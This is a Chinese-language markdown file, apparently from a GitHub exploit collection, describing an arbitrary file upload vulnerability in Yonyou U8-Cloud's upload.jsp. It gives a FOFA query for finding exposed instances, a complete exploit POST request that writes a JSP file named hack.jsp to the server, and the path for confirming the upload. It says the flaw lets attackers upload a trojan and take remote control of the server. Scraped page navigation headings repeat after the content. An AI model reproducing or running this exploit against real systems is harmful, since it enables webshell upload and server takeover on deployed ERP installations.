用友U8-Cloud upload任意文件上传漏洞

该系统upload.jsp存在任意文件上传漏洞，攻击者可通过该漏洞上传木马，远程控制服务器

fofa

app="用友-U8-Cloud"

exp

POST /linux/pages/upload.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0
Connection: close
Content-Length: 31
Content-Type: application/x-www-form-urlencoded
filename: hack.jsp
Accept-Encoding: gzip

<% out.println("The website has vulnerabilities!!");%>

漏洞复现

路径

http://ip:port/linux/hack.jsp

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

用友U8-Cloud upload任意文件上传漏洞.md

用友U8-Cloud upload任意文件上传漏洞.md

用友U8-Cloud upload任意文件上传漏洞

fofa

exp

漏洞复现

路径

Files

用友U8-Cloud upload任意文件上传漏洞.md

Latest commit

History

用友U8-Cloud upload任意文件上传漏洞.md

File metadata and controls

用友U8-Cloud upload任意文件上传漏洞

fofa

exp

漏洞复现

路径